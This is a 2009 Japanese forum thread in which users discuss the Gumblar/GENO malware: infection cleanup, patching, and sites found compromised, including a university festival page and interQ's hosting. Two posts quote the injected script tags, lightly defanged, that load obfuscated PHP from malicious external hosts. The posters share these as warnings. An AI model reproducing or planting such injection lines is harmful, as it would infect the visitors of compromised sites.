650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 18:08:37 ] バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、 もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ
651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 23:35:48 ] でもレジストリまでそのままリストアしたらアウトってこと レジストリ内にGENOを起動させる設定があるからね きちんと修正したレジストリならば戻しても大丈夫じゃないかな
652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:29:50 ] レジストリをいじるプログラムなんかをその感染後にバックアップした中から また入れなおすときには要注意ってことかなるほど
653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:36:33 ] レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。 画像ファイルやテキストワードファイルや音楽ファイルなんかは それ自体はレジストリいじるのはあまりないだろうし、 それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。 詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。
654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:48:59 ] ほんとにわかってるのかすごく心配になる文章だな つーか何を言いたいのか1回読んだだけじゃまったく理解できん とりあえず1行目のは実行ファイルっていえばいいんじゃね
655 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:58:58 ] 実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな やっと解読できた Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に 埋め込まれることが多いからちょっと違う場所なんだけどね まあレジストリは下手にいじると本当に危ないんで注意してください
656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 10:00:18 ] //404の中身が変わって、有害化してるらしい。 中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。
657 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 14:13:21 ] >>656 のとおり、 一時期無害化されていたGumblar.xが攻撃再開。ご注意を。
658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 08:54:42 ] こんなの貼られてた Hは半角小文字、前後のスペースなし ●は.で </head> <script src= H ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>
659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 16:41:42 ] Google Chormeでのweb巡回でもGENO対策になりますか・・・ 横レススマソ
660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:12:22 ] いいえ どこが横レスなのかわからん Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど 新型感染サイトはブロックされない可能性がある まずは各種ソフトウェアの更新をしっかりやってください
661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:25:48 ] ソフトウェアの更新については>>359 あたり参照 今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新
662 名前:名無しさん@お腹いっぱい。 [2009/11/08(日) 13:15:38 ] Javaランタイムのバージョン確認方法は
663 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 14:00:58 ] >>662 サイトくらい見ればいいのに www.java.com/ja/download/installed.jsp あと設定→コントロールパネル→Java→ 基本タブにあるバージョン情報ボタンクリック
664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 21:01:02 ] バージョンすら確認出来ないのにネットやってて大丈夫なのかよw
665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 18:28:40 ] あったりまえじゃん! ぜーんぜんへーきさ
666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 19:30:54 ] 立命館大学の学園祭HPが感染したってマジか?
667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 20:56:59 ] >>666 貴方↓の中の人ですか? ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/ Gumblar.xですか。 ソースチェカー ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua= Googleから行くと弾かれますね。 立命館大学衣笠学園祭事務局 問い合わせ ttp://www.rits-fes.net/mail/index.html TEL/FAX:075-465-7891 ↑ 電話で教えて差し上げましたが対応が最悪です。 挙句の果てに電話を切られました。もうね、アホかとw
668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:06:39 ] うほwwwwwがっつり感染しとるwww
669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:12:18 ] >>667 今行くと404が出るからやっと対応したのかな? でも今日の時点でアクセスカウンターが3万行ってたんだから きちんと経緯とかを説明して欲しいね
670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:39:18 ] 中の人ならいまさらマジかっていわないだろwww
671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:51:07 ] 【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 (09/11/09) pc11.2ch.net/test/read.cgi/pcnews/1257767416/
672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 23:21:36 ] >>671 難しくてわからない 3行にまとめて下さい
673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 18:53:13 ] ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq= 立命館大学BKC学園祭事務局 TEL:077-561-3990 ↑ に電話をしたところ、話の途中でFAX回線に切り替えられましたw ピーピロピロピーってorz [PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題 ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf カタカナ英語使えばいいってもんじゃないっしょww
674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 20:14:45 ] 関西の大学に常識的な対応を期待するなよ
675 名前:名無しさん@お腹いっぱい。 [2009/11/13(金) 16:15:20 ] majormess.nlってのもGENOの亜種ですか? またクロームで警告あったんですが・・
676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:32:49 ] 今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも?
677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:52:16 ] そこからさらに亜種も派生してさらに蔓延すると 今回はLoveLetter以来のかなり悪質なものだね
678 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 15:17:39 ] 巻き込み規制喰らってるので携帯からorz http://www●interq●or●jp/ Redirectにコードが仕込んであるっぽい -- <meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/"> </head> <script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body> -- http://ykcv●org/upload_data/blogslideconf/hvkh●php ↓ http://forgottenchild●in/fieldtrips/shareyourlove●php 業種的にやばすぎるというか 終わってるだろ・・・
679 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 16:56:08 ] >>678 今ソース見てきたけど、直ってね?
680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 17:38:53 ] >>678 Gumblar再来襲。interQのホームページスペース「404エラー」改ざん ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html 404も改ざんされてたらしいけど、今はどうなんだろ?
681 名前:679 [2009/11/14(土) 18:33:50 ] ありゃ、>>678 のソースが復活してら。駄目だねこりゃ。
682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 18:44:30 ] Welcome to Oriental Tunes Dear Visitor You have requested a page or file that does not exist on the site you came from. You can proceed to Oriental Tunes and look for that file on our site.
683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 00:08:40 ] ISPのシス管感染ワロス 自社オプションサービスのウィルスチェックしてみればいいのにね
684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:01:02 ] さすがは悪名高いinterQ・・・
685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:24:28 ] 修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正・・・ 無限ループすんなよwww interQ\(^o^)/オワタ
686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 03:07:43 ] 無限ループしてる=シス管がGumblarの対処法を知らない いくら何でも致命的すぎないか……?
687 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 06:59:43 ] セーフ ブラウジング interq.or.jp の診断ページ www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja 不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。 AS7506 (INTERQ). www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja ※コメントは省略す(苦笑
688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 08:11:16 ] interqなんてDQNしか使わないよ よって影響なし